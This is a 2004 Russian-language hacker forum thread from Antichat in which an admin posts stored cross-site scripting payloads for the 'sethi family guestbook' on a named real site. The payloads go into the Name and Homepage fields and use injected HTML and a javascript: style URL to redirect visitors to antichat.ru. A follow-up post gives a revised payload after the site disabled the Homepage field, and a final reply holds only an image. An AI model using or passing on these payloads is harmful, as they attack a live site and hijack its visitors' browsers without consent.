Уязвимость гостевой книги  sethi family guestbook

Discussion in 'Уязвимости' started by Егорыч+++, 19 May 2004.

  1. Егорыч+++

    Егорыч+++ Admin
    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,373
    Likes Received:
    895
    Reputations:
    20
    В общем в тело Name вставляем

    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><div id=aa>http://antichat.ru</div>[/QUOTE]<span id='postcolor'>

    В тело Homepage

    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">"><a style=background-image:url(javascript:navigate(aa[0].innerText));[/QUOTE]<span id='postcolor'>

    Получаем редирект на АНТИЧАТ.
    Адрес скрипта http://www.sethi.org/guestbook
     
    #1 Егорыч+++, 19 May 2004
  2. Егорыч+++

    Егорыч+++ Admin
    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,373
    Likes Received:
    895
    Reputations:
    20
    Сегодня зашел на из гостевую они прикрыли ввод homepage. Умники.

    Вводим в имя

    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"><div>http://antichat.ru</div><a style=background-image:url(javascript:navigate(aa[0].innerText));[/QUOTE]<span id='postcolor'>

    И получаем редирект на АНТИЧАТ.
     
    #2 Егорыч+++, 20 May 2004
  3. Algol

    Algol New Member

    Joined:
    29 May 2002
    Messages:
    1,759
    Likes Received:
    4
    Reputations:
    0
    [​IMG]
     
    #3 Algol, 20 May 2004
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.